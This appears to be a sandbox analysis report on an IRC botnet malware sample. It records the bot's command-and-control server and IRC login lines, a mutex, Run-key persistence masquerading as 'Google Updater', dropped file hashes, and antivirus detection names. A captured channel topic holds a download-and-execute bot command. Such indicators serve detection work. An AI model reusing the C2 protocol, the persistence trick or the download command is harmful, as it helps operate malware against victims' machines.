irc.148club.com

irc.148club.com:6667
NICK {NEW}[USA][XP-SP2]046767
USER 2260 "" "lol" :2260
JOIN #niu
NICK [USA][XP-SP2]610113
USER 9833 "" "lol" :9833
NICK [USA][XP-SP2]253886
USER 8004 "" "lol" :8004
* The following Host Name was requested from a host database:
o irc.148club.com

Other details

* To mark the presence in the system, the following Mutex object was created:
o fJHGgjJNhgK

* The following ports were open in the system:

Port    Protocol    Process
1040    TCP         lssas.exe (%Temp%\lssas.exe)
1042    TCP         lssas.exe (%Temp%\lssas.exe)
1046    TCP         lssas.exe (%Temp%\lssas.exe)

Registry Modifications

* The newly created Registry Values are:
o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
+ Google Updater = "%Temp%\lssas.exe"

so that lssas.exe runs every time Windows starts
o [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
+ Google Updater = "%Temp%\lssas.exe"

so that lssas.exe runs every time Windows starts

Memory Modifications

* There were new processes created in the system:

Process Name                    Process Filename                          Main Module Size
lssas.exe                       %Temp%\lssas.exe                          69 632 bytes
[filename of the sample #1]     [file and pathname of the sample #1]      69 632 bytes

File System Modifications

* The following files were created in the system:

# 1
Filename(s): %Temp%\google_cache92.tmp
File Size:   9 bytes
File Hash:   MD5: 0x6C936CB4A4B7F5803BD2E3DEACC3C2FE
             SHA-1: 0x561782F6CC10BA3E5AFEAED752F95E589C813891
Alias:       (not available)

# 2
Filename(s): %Temp%\lssas.exe
             [file and pathname of the sample #1]
File Size:   48 128 bytes
File Hash:   MD5: 0x3CB6A3F17487B916CB40E73E0D88C30B
             SHA-1: 0x637EB585CB6B96E0F56C6ABF620B72A48C77403B
Alias:       New Malware.b [McAfee]
             Mal/SillyFDC-A, Mal/IRCBot-B, Mal/IRCBot-C [Sophos]
             Win32.SuspectCrc [Ikarus]

Now talking in ##USA
Topic On: [ ##USA ] [ .dl 1 http://google.com/index.exe or.exe ]
Topic By: [ [BRA][2K3]704872 ]
Modes On: [ ##USA ] [ + 12]
